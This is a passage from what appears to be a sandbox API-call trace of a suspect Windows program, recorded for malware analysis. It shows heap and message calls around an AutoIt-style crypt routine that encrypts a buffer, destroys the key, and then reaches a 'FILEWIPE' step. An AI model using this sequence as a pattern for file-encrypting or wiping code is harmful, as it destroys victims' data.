dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0186.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.936] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0186.936] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.936] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.937] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.937] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.937] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.937] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.937] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.937] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.938] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.938] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x3928, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x3930) returned 1 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] CharLowerBuffW (in: lpsz="byte[14641]", cchLength=0xb | out: lpsz="byte[14641]") returned 0xb [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.939] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.939] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf1278*, pdwDataLen=0x87e820*=0x3928, dwBufLen=0x3930 | out: pbData=0xbf1278*, pdwDataLen=0x87e820*=0x3930) returned 1 [0186.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0186.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.939] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.939] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.939] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0186.940] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.940] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.940] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0186.940] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.941] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.942] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.942] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.942] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.942] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.942] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0186.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.942] CryptDestroyKey (hKey=0x90aed8) returned 1 [0186.942] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.942] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.942] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.942] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.942] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0186.942] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.942] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.942] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.943] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0186.943] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0186.943] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0186.943] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.943] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.943] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.943] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.943] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.943] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.944] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.944] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.944] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.944] FreeLibrary (hLibModule=0x74f20000) returned 1 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.946] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.947] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.947] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: 